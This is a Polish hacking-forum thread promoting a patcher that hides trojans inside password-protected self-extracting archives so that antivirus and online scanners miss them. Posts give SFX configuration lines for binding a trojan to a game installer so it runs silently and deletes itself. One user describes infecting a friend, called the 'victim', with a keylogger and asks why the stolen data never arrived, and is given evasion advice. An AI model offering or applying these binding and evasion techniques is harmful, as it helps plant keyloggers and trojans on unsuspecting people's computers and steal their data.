SFX Password Patcher

[hxv]

Parę dni temu napisałem tutek jak zrobić niewykrywalny plik przy pomocy archiwum SFX zabezpieczonego hasłem.
Jako że należało pobawić się debuggerem nie każdy mógł sobie poradzić.

Dziś daję prosty programik który odwali najtrudniejszą robotę za nas: SFX Password Patcher.

Należy wypakować plik i uruchomić z konsoli sfx.exe z parametrami:

sfx.exe <archiwum_sfx.exe> <haslo_do_archiwum>

np.

sfx.exe trojan.sfx.exe tajne

Jakby ktoś nie wiedział jak zrobić takie archiwum to tutaj mamy artykuł Małego, wszystko ładnie wyjaśnione.

Program w odróżnieniu od poprzedniej wersji zamiast nadpisywać bajty w pliku 'analizuje' archiwum i (teoretyczne

) sam ustala co i jak nadpisać.

Program pisany w PHP, 'kompilowany' przy użyciu bamcompile 1.21 i spakowany FSG aby trochę odchudzić plik. Wiem że PHP nie jest najlepszym językiem do robienia tego typu programów ale dla mnie to wygodniejsze [;. W paczce dołączam źródełka jakby ktoś chciał wiedzieć jak to działa (i od razu mówię że ciężko się w tym połapać).

 

[fr0zon]

Robiłem już tak kiedyś

To jest dobry sposób na loli co wrzucają pliki na skanery online.
Jezeli nie bedziewiedział ze aby wydobyc serwer starczy RMB i kliknac na wypakuj tutaj

 

[hxv]

No tutaj nie wystarczy bo hasło jest tylko wpisywane w przypadku uruchomienia archiwum. Przy próbie ręcznego wypakowania trzeba podać hasło (więc nie da się wyciągnąć serwera)

 

[fr0zon]

Nie no spoko to wiem

Mnie chodzilo jezeli ktos by itak znal haslo a chcialby serwer wypakowac i go przeskanowac to by to zrobil przez rypakowanie WinRar-em.

 

[adam3076]

a moze wiecie jak zrobic sfx zeby po uruchomieniu trojan sie uruchomił a np gra czy cos tam sie tylko rozpakowala i nie chodzi mi o cos takiego

silent=1
setup=pierwszypliksciema.exe
setup=trojan.exe
Overwrite=1
path=%temp%


bo tu oba pliki sie uruchamiaja

 

[hxv]

Zmień path, wypakuje się i trojan i gra. Dobry trojan powinien sie po uruchomieniu usunąć więc zostanie tylko gra

 

[adam3076]

zmien path ale na co ? a co do trojana to nie musi byc dobry wystarczy zaraz po setup=server.exe dodac del=server.exe

 

[hxv]

Ja bym strzelał że np. na '\' albo '\dir'

 

[kkidler]

Zrobilem wszystko tak jak nalezy ( w mojej opinii ), testowalem u siebie wszystko ladnie gra włącza sie program instalacyjny danego programu, a w tle włącza sie keyloger. Uzywam Confident_A+. Maile norlamnie dochodzily odemnie itp. wiec wszystko bylo jak nalezy. I tu dalej pojawia sie problem, bo wyłając ten sam 'zbindowany' juz plik komukolwiek on go otwiera i dupa. Mowi ze mu wszystko dziala, ze moze zainstalowac, lecz do mnie zadne maila nie dochodza. Co moze byc problemem?

PS: Drugie pytanko, jesli plik ten jest niewykrywalny (a tak jest bo sprawdzalem) czy jest on dalej przy otwieraniu go tj. kiedy odpala sie ten niewidzialny keyloger?

Dzieki i pzdro.

 

[hxv]

1. Jeśli u Cienie na kompie działa a u ofiary nie to problem leży po stronie ofiary. Może ma AV albo Firewalla?
2. Plik po wypakowaniu jest taki jak był przed spakowaniem. Czyli jeśli miał wykrywalność 100% to jest to 'chowane' tylko w przypadku ręcznego skanowania archiwum, po wypakowaniu AV może zareagować. Jeśli natomiast wykrywalność była równa 0 to taka zostaje.

 

[kkidler]

Wiec teoretycznie wszystko powinno grac ( na jotti.org wykrywalnosc wynosi 0 ), kumpel wlanczyl archiwum bo zainstalowal program ktory tam byl, wiec TEORETYCZNIE wirus powinien dzialac, lecz tak nie jest. No nic, musze sprobowac u kogos innego ale nie rozumiem jakim sposobem nie zadzialalo u niego.

P

Pozdrowienia.

 

[hxv]

Tak jak napisałem: możliwe że ma firewalla lub anyvira. Wtedy ten sposób nic nie pomaga.

 

[dymex]

A ja w patcherze mam błąd że "Byte not found! File is already patched! Nothing pached! ...done!" chociaż to nie prawda, o co kaman?

 

[nitr0]

skoro tak się dzieje tzn że to jednak prawda xP

 

[hxv]

Uploadnij gdzieś ten plik i daj link, zobaczę, bardzo możliwe że ja coś nie tak zrobiłem [;

 

[dymex]

Proszę: http://www.speedyshare.com/738611569.html

 

[hxv]

Dobra, wiem gdzie leży problem. Wszystko zależy od rozmiaru słownika, powinien być ustawiony na 128KB. Ustaw poziom kompresji na normalny, wejdź w zakładkę zaawansowane i kliknij kompresja. W okienku ustaw rozmiar słownika na 128KB, powinno działać.
Jeśli chcesz zostać przy takiej kompresji to zostaje Ci tylko ręczna zmiana przy pomocy debuggera. Jak znajdę czas to się pobawię i napisze coś co będzie działać niezależnie od tego parametru.

 

[dymex]

Nadal to samo wyskakuje...
A z debuggerem nie wiem bo nie mogę znaleźć tego "kolorowego" tylko jakiś mam gdzie białe jest wszystko.

 

[hxv]

'Kolorowe' to są po prostu linie z kodem. Zjedź na sam dół (klawisz End) i potem powoli do góry aż trafisz na linijki 'inne niż wszystkie' xD
Od dołu wszystko powinno wyglądać tak:

DB 00

Jak trafisz na coś w stylu

JMP DWORD PTR DS:...
JMP DWORD PTR DS:...
INT3
INT3
DB 00

To masz ten fragment

I jak chcesz kolorowe linijki to pobierz sobie DeFixed

 

[dymex]

Nie... :/ Poddaję się xD Nie potrafię tego zrobić.